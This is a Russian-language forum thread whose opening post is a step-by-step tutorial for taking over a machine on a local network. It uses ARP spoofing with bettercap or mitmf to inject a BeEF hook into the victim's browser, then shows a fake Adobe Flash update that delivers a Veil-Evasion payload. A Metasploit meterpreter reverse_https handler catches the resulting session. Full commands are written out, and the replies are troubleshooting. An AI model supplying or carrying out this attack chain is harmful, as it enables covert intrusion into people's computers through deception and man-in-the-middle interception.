Соц.инженерия или как доставить полезную нагрузку

kot-gor

Gold Team
07.09.2016
494
583
#1
Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

заплатка.png

лечиться это следующей заплаткой
easy_install -U pip
pip install Twisted==15.5.0


Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.

А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

cd /usr/share/beef-xss/
./beef

запус beef.png
Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес

Для просмотра контента необходимо: Войти или зарегистрироваться


Login: beef
Pasword: beef

воод пароля beef.png

после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.


1111.png

2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:

sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "
Для просмотра контента необходимо: Войти или зарегистрироваться
"


запуск bettercapa.png

где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!

Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

ifconfig.png

Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:

python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url
Для просмотра контента необходимо: Войти или зарегистрироваться


wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командой route -n

routen.png

Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
Еще раз повторюсь, по данной ссылке:
https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.

После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой

python -m SimpleHTTPServer 8081
консоль не закрываем!

Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).:rolleyes:
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc

Для тех кто не ищет легких путей:
запускаем метасплойт командой: msfconsole
далее вводим:

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.102
(свой внутренний IP )
set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.

Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.

beef левая колонка.png

Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :
Для просмотра контента необходимо: Войти или зарегистрироваться

Для просмотра контента необходимо: Войти или зарегистрироваться


последняя фаза beef.png

Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.

На этом пока всё, спасибо за внимание. :)
 
Последнее редактирование:

Lisenok

Премиум
02.04.2016
101
58
#5
Познавательно, буду пробовать)Благодарствую. Доучиться бы до момента когда сам смогу все это придумывать,находить.
 

Lisenok

Премиум
02.04.2016
101
58
#6
Что за mitmf? у меня bettercap не пашет, ошибка такая "undefined method 'arp_opcode" for nil:NilClass" :( Если поможете буду благодарен!
 

kot-gor

Gold Team
07.09.2016
494
583
#7
Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap.
 

Lisenok

Премиум
02.04.2016
101
58
#8
Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap.
попробую, что выйдет отпишу. благодарю!
 

Knife

Member
16.10.2016
6
5
#9
За пределами локальной сети эта связка неосуществима получается?
 

kot-gor

Gold Team
07.09.2016
494
583
#10
За пределами локальной сети эта связка неосуществима получается?
За пределами локальной сети другая связка, уязвимость xss по другому немного эксплуатируется..здесь я показал самый простой пример.
 
Последнее редактирование:
29.11.2016
18
1
#11
Вопрос по Beef

Код:
http://xxx.xxx.xxx.xxx:3000/hook.js
вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.
 

kot-gor

Gold Team
07.09.2016
494
583
#12
Вопрос по Beef

Код:
http://xxx.xxx.xxx.xxx:3000/hook.js
вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.
если в браузере..то скорее всего у вас не запустился сервер на 3000 порту.
 

kot-gor

Gold Team
07.09.2016
494
583
#15
можете скриншот показать с вашей проблемой?так будет проще. я просто не могу понять на каком этапе у вас это выскакивает
 
29.11.2016
18
1
#16
можете скриншот показать с вашей проблемой?так будет проще. я просто не могу понять на каком этапе у вас это выскакивает
Для просмотра контента необходимо: Войти или зарегистрироваться






Хочу обратить внимание - запуск идет не через beff-xss а через папку и ./beef
 

MAdDog719

Well-known member
16.08.2016
108
26
#17
Вопрос по Beef

Код:
http://xxx.xxx.xxx.xxx:3000/hook.js
вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.
была таже проблема, решилась после переустановки кали
 
29.11.2016
18
1
#18
была таже проблема, решилась после переустановки кали

Координальное решение =) Ради интереса, я скачал beef с гитхаба и поставил его - результат тот же, видимо что то не хватает ему для успешной работы.